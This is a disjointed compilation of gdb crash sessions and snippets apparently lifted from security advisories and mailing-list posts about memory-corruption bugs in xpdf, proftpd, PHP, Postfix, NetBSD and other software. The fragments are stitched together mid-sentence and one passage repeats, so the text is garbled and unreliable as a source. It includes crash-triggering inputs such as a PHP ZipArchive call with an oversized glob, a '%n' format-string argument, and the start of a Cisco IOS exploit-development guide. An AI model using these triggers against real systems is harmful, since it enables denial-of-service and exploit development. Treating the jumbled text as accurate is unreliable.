gdb
[root@pi3book xpdf-3.02]# xpdf elo.pdf
Error: PDF file is damaged - attempting to reconstruct xref table...
Naruszenie ochrony pamięci
[root@pi3book xpdf-3.02]#
and gdb output:
(gdb) bt
#0 0x080c222a in SplashOutputDev::imageSrc (data=0xbfffec84, colorLine=0xb7fe46de '�' <repeats 200 times>..., alphaLine=0x0) at SplashOutputDev.cc:1848
#1 0x080fedc0 in Splash::drawImage (this=0x81e5878, src=0x80c20d0 <SplashOutputDev::imageSrc(void*, unsigned char*, unsigned char*)>, srcData=0xbfffec84,
srcMode=splashModeRGB8, srcAlpha=0, w=1102, h=2000000000, mat=0xbfffec50) at Splash.cc:2532
Segmentation fault
and more like proftpd.
Simple crash for CVE-2010-4051
(gdb) x/i $rip
=> 0x7ffff7ad3ea2: mov %eax,0x50(%rsp)
(gdb) x/i $eax
0x2: Cannot access memory at address 0x2
(gdb) x/i $rsp
0x7fffff5fef90: Cannot access memory at address 0x7fffff5fef90
Step-by-step instructions for debugging IOS using gdb - Andy Davis,
2008 (iosftpexploit "at" googlemail <dot> com):
I have been asked by many people for a simple step-by-step guide for
setting up an IOS exploit development environment, which includes
connecting to a Cisco router using gdb, so here goes:
(By the way the router I connect to is a Cisco 2621XM)
Apparently the application server uses a user-controlled value as the "size"
parameter to a "memmove()" call, so we control the number of bytes being
moved. Using a huge value makes the application overwrite EIP and causes a
Denial of Service.
--- GDB OUTPUT BEGIN ---
# gdb -p 12748
Attaching to process 12748
Reading symbols from
/microsiga/protheus10/bin/appserver/totvssrvlinux...(no debugging
symbols found)...done.
This is the debug information about this vulnerability (from Sun Solaris 9 x86).
Breakpoint 1, 0xd330e5b0 in adm_build_path ()
from /usr/snadm/lib/libadmapm.so.2
(gdb) until *adm_build_path+38
0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
(gdb) x/i $pc
0xd330e5c6 <adm_build_path+38>: call 0xd3304fa8 <strcat@plt>
(gdb) x/x $esp+4
0x80411e4: 0x080b7cd0
to attack server behind other servers... but... everyone knows probably better vectors :)
Proof of concept
[root@pi3-test apache]# gdb -q ./bin/httpd
(gdb) r -X
Starting program: /usr/local/apache/bin/httpd -X
[Sun Dec 27 05:03:19 2009] [alert] httpd: Could not determine the server's fully
qualified domain name, using 127.0.0.1 for ServerName
}
# /usr/local/bin/gcc -o jaja2 jaja2.c
# ./jaja2 512
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q jaja2
(no debugging symbols found)
(gdb) r 512
Starting program: /jaja2 512
(no debugging symbols found)
(no debugging symbols found)
331 Password required for dude
pass dude
and in the same time
# gdb -q proftpd 15814
(no debugging symbols found)
Attaching to program: /usr/local/sbin/proftpd, process 15814
Reading symbols from /usr/lib/libutil.so.11.2...done.
Loaded symbols for /usr/lib/libutil.so.11.2
Reading symbols from /usr/lib/libc.so.58.0...done.
n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <=== CRASH HERE IF ZIPARCHIVE::FL_UNCHANGED
for (i=0; i<n; i++) {
..
-zip_name_locate.c-------------------------------------
(gdb) bt
#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x116ac70 "a", flags=32767,
error=0xffffffff00000000) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65
#1 0x00000000006381e6 in c_ziparchive_locateName (ht=2, return_value=0x1169418, return_value_ptr=0xffffffff,
this_ptr=0x118d530, return_value_used=-176126592) at /build/buildd/php5-5.3.3/ext/zip/php_zip.c:1877
#2 0x00000000006e986a in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7eb7068)
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000001007ca000
[Switching to process 2342]
0x00007fffffe00847 in __memcpy ()
(gdb) i r
rax 0xffffffffeb790000 -344391680
rbx 0x10078c000 4302880768
rcx 0xfffffffffff3e000 -794624
rdx 0x0 0
rsi 0x1150fc000 4648321024
database server with a large XDR-encoded ASCII string as its argument.
Breakpoint 1, 0xd37b2200 in _tt_internal_realpath () from
/usr/lib/libtt.a(shr.o)
(gdb) where
#0 0xd37b2200 in _tt_internal_realpath () from /usr/lib/libtt.a(shr.o)
#1 0xd37af9f0 in _tt_get_realpath__FPcT1 () from /usr/lib/libtt.a(shr.o)
#2 0xd37b00b4 in _tt_realpath () from /usr/lib/libtt.a(shr.o)
#3 0xd37b287c in _Tt_file_system::bestMatchToPath () from
/usr/lib/libtt.a(shr.o)
Scan engine v5.1.00 for Linux.
Virus data file v4777 created Jun 05 2006
Scanning for 194376 viruses, trojans and variants.
# gdb /usr/local/uvscan/uvscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions. There is
> I'm beginning studying deeply exploits. Now I have a problem. I'm
> trying a return-to-libc exploit but I get a segmentation fault when
> executed in the terminal and I get the code correctly executed when I
> run it inside GDB. Does GDB alter the memory map of a process when
> executed inside it? In which way? Where I can read info about this?
It's hard to say exactly what's going on without seeing the example
code you're trying to exploit. But let me give you some basic
thoughts..
gives a NULL pointer dereference here.
Changing the length of the first parameter of grapheme_extract() also changes rip in memcpy(3).
(gdb) r -r 'grapheme_extract('a',-1);'
..
(gdb) x/i $rip
=> 0x7ffff5511d99 <memcpy+777>: mov %rax,(%rdi)
(gdb) x/x $rax
0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70
Mar 25 05:34:40 /netbsd: panic: trap
Mar 25 05:34:40 /netbsd: Faulted in mid-traceback; aborting...
Adjust depth as required.
(gdb) bt
#0 ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:112
#1 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
#2 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
#3 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
#4 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
memset(in.str, 0, (e - s) + YYMAXFILL);
memcpy(in.str, s, (e - s));
Program received signal SIGSEGV, Segmentation fault.
0xbba7581c in memset () from /usr/lib/libc.so.12
(gdb) x/i $eip
0xbba7581c <memset+44>: rep stos %eax,%es:(%edi)
(gdb) x/x $eax
0x0: Cannot access memory at address 0x0
(gdb) x/x $edi
0x0: Cannot access memory at address 0x0
Updated versions of all supported hosted products and all ESX 2x
products and patches for ESX 30x address critical security updates.
Service Console security updates for samba, bind, krb5, vixie-cron,
shadow-utils, openldap, pam, gcc, and gdb packages.
2. Relevant releases:
VMware Workstation 6.0.0
VMware Player 2.0.0
in result
# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
(no debugging symbols found)
Hi,
I'm beginning studying deeply exploits. Now I have a problem. I'm
trying a return-to-libc exploit but I get a segmentation fault when
executed in the terminal and I get the code correctly executed when I
run it inside GDB. Does GDB alter the memory map of a process when
executed inside it? In which way? Where I can read info about this?
This is the problem:
fcano@gohan ~/ShellcodersHandbook/code/ch02 $ ./ret2libc 609 1776
Using address: 0xbfffeb08
---bsd/netbsd---
unlink("empty.zip"); fopen("empty.zip","a"); $nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("A",1000000),0x39);
Program received signal SIGSEGV, Segmentation fault.
0xbb86bb12 in realloc () from /usr/lib/libc.so.12
(gdb) i r
eax 0x410041 4259905
ecx 0xc 12
edx 0xbfb00000 -1078984704
ebx 0xbb8c81f4 -1148419596
esp 0xbfbfa980 0xbfbfa980
printf("grams = %lf\n", weed);
return 0;
}
(gdb) r
Starting program: /Volumes/ARC/299
Reading symbols for shared libraries ++. done
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000
*) Maybe others?
Ok let’s analyse Adobe Acrobat vuln in version 9.1.1:
# gdb --pid=<smth>
…
…
eax=6167343A ebx=5959595A ecx=6167343C edx=04A96F89 esi=6E6C0055
edi=59595957
ebp=6E6C006C esp=0022E51B program=C:\sshd\bin\scp.exe
cs=001B ds=0023 es=0023 fs=0038 gs=0000 ss=0023
$ gdb /usr/bin/touch.exe
GNU gdb 2003-09-20-cvs (cygwin-special)
...
(gdb) r AAAA ...
Program received signal SIGSEGV, Segmentation fault.
0x61091eea in getppid () from /usr/bin/cygwin1.dll
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
What is wrong? Let's see
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %99999999999999999999n
Starting program: /cxib/C/pln %99999999999999999999n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
and me in my initial disclosure [4] were using a patched PHP (for example
Suhosin, both loaded as .so or "built-in", Ubuntu PHP, that is patched
with Suhosin, etc).
This is thanks to deep and extensive testing and observation plus some
code navigation and gdb magery with the help of evilaliv3 and Wisec.
To overcome this limitation we came up with the universal path
normalization vector for PHP that is not a single "/" but "/.". Well
this is the case in which a single char really changes things.
0x28132f4f <__vfprintf+9727>: repnz scas %es:(%edi),%al
This is caused by the following call in the elfdump.c file:
fprintf(out, "\te_ident: %s %s %s\n", ei_classes[class], ei_data[data],
ei_abis[osabi]);
[Dreg@ ~/vuln]# gdb --core elfdump.core
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
ps
USER PID PPID VSIZE RSS WCHAN PC NAME
root 1 0 248 64 c0084edc 0000ae2c S /init
root 2 0 0 0 c0049168 00000000 S kthreadd
...
root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb
app_0 1574 535 83564 12832 ffffffff afe0c79c S
com.google.android.browser
root 1600 587 840 324 00000000 afe0bfbc R ps
# cat /proc/1574/maps
cat /proc/1574/maps
) = 318
fflush(0x40187860) = 0
strcpy(0x81f0660, "\\[x4141414141414109].\\[x41414141"...) = 0x81f0660
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[root@lost-coder mtr-0.72]# gdb -q ./mtr core
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from /lib/libresolv.so.2...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Postfix SMTP server process crashes in "step 2" of the DIGEST-MD5
authentication protocol. This happens while attempting to read from
a pointer that contains an invalid address.
In this particular example, the Postfix SMTP server crashes while
running under control of the GDB debugger (see the Postfix master(5)
manpage discussion of the -D option), while processing the SMTP
commands shown in the example above.
(gdb) where
#0 0x884bbedf in clear_reauth_entry (reauth=0x206e6f69, type=SERVER,
0xdee860f <_ZN11JBIG2Stream17readSymbolDictSegEjjPjj+3779>: cmp 0x8(%eax),%ecx
0xdee8612 <_ZN11JBIG2Stream17readSymbolDictSegEjjPjj+3782>: jae 0xdee861a <_ZN11JBIG2Stream17readSymbolDictSegEjjPjj+3790>
0xdee8614 <_ZN11JBIG2Stream17readSymbolDictSegEjjPjj+3784>: mov 0xc(%eax),%eax
0xdee8617 <_ZN11JBIG2Stream17readSymbolDictSegEjjPjj+3787>: mov %esi,(%eax,%edi,1) <----- Crash
(gdb) i r $esi $eax $edi
esi 0xc79e860 209315936
eax 0x0 0
edi 0x0 0
(gdb) bt